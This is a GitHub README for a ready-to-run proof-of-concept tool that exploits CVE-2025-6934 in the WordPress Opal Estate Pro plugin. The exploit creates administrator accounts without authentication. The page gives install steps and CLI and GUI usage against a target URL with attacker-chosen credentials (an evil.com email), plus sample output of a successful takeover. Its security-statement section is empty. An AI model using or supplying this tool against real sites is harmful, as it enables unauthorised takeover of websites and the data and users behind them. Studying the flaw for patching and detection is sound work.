MejbanKadir/CVE-2025-6934-PoC
GitHub: MejbanKadir/CVE-2025-6934-PoC
针对 WordPress Opal Estate Pro 插件高危漏洞的 PoC 工具,支持未认证创建管理员账户,提供图形和命令行双界面。
Stars: 0 | Forks: 0
# 🔓 CVE-2025-6934 漏洞利用工具
### WordPress 插件 Opal Estate Pro 未认证管理员账户创建




**由 mejbankadir 全权创建和开发**
*(SMH tech 和 Mejban HackSheild 隶属 NexoAmicus)*
## 📋 描述
CVE-2025-6934 是 WordPress **Opal Estate Pro** 插件(版本 <= 1.7.5)中的一个严重漏洞,允许未经认证的攻击者在受影响的 WordPress 网站上创建管理员账户。
该工具提供 **CLI**(命令行)和 **GUI**(图形用户界面)两个版本来利用此漏洞。
## ⚠️ 漏洞详情
| 属性 | 值 |
|-----------|-------|
| **CVE ID** | CVE-2025-6934 |
| **严重程度** | Critical (CVSS 3.1: 9.8) |
| **受影响插件** | Opal Estate Pro |
| **受影响版本** | <= 1.7.5 |
| **漏洞类型** | 未认证管理员账户创建 |
| **CVSS 向量** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
## 🛠️ 安装
### 前置条件
```
# 克隆 repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# 安装 dependencies
pip install -r requirements.txt
```
### 环境要求
```
requests
beautifulsoup4
colorama
PyQt6 # For GUI version only
```
## 🚀 用法
### GUI 版本(推荐)
```
python3 CVE-2025-6934-GUI.py
```
**GUI 特性:**
- 现代深色主题界面
- 实时利用进度
- 彩色控制台输出
- 输入验证
- 非阻塞执行
### CLI 版本
```
python3 CVE-2025-6934.py -u http://target.com -mail attacker@evil.com -password P@ssw0rd123
```
**参数:**
```
-u, --url Target URL (required)
-mail, --newmail Email for admin account (required)
-password, --newpassword Password for admin account (required)
-user, --username Username for admin account (default: administrator)
```
## 📖 示例
```
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
```
### CLI 示例
```
$ python3 CVE-2025-6934.py -u http://example.com -mail admin@evil.com -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : admin@evil.com
Password : MyP@ss123
Role : administrator
```
## 🎨 特性
### CLI 版本
- ✅ ASCII 艺术 Banner
- ✅ 彩色输出(使用 colorama)
- ✅ 版本检查
- ✅ Nonce 提取
- ✅ JSON 响应处理
### GUI 版本
- ✅ 现代深色主题 UI
- ✅ 实时控制台输出
- ✅ 输入验证
- ✅ 后台线程执行
- ✅ 状态栏
- ✅ 响应式设计
## 🔒 安全声明
## 📝 致谢
| 角色 | 名字 |
|------|------|
| **创建者 & 开发者** | **mejbankadir** |
| **组织** | SMH tech & Mejban HackSheild 隶属 NexoAmicus |
## 📂 项目结构
```
CVE-2025-6934/
├── CVE-2025-6934.py # CLI version
├── CVE-2025-6934-GUI.py # GUI version
├── CVE-2025-6934.yaml # Documentation
├── requirements.txt # Python dependencies
└── README.md # This file
```
## 🐛 故障排除
### SSL 证书错误
该工具会自动禁用 SSL 警告。如果您遇到问题:
```
requests.packages.urllib3.disable_warnings()
```
### Nonce 提取失败
- 确保目标 URL 正确
- 检查是否安装了 Opal Estate Pro 插件
- 验证站点是否运行 WordPress
## 📜 许可证
MIT License
版权所有 (c) 2025 **mejbankadir** (SMH tech 和 Mejban HackSheild 隶属 NexoAmicus)
**由 mejbankadir 用 ❤️ 制作**
*SMH tech | Mejban HackSheild | 隶属 NexoAmicus*
标签:CISA项目, CVE-2025-6934, CVSS 9.8, Exploit, GUI工具, Maven, Opal Estate Pro, POC, PyQt6, Python, Splunk, Web安全, WordPress插件, WordPress漏洞, 协议分析, 威胁模拟, 无后门, 未授权管理员创建, 权限提升, 漏洞验证, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞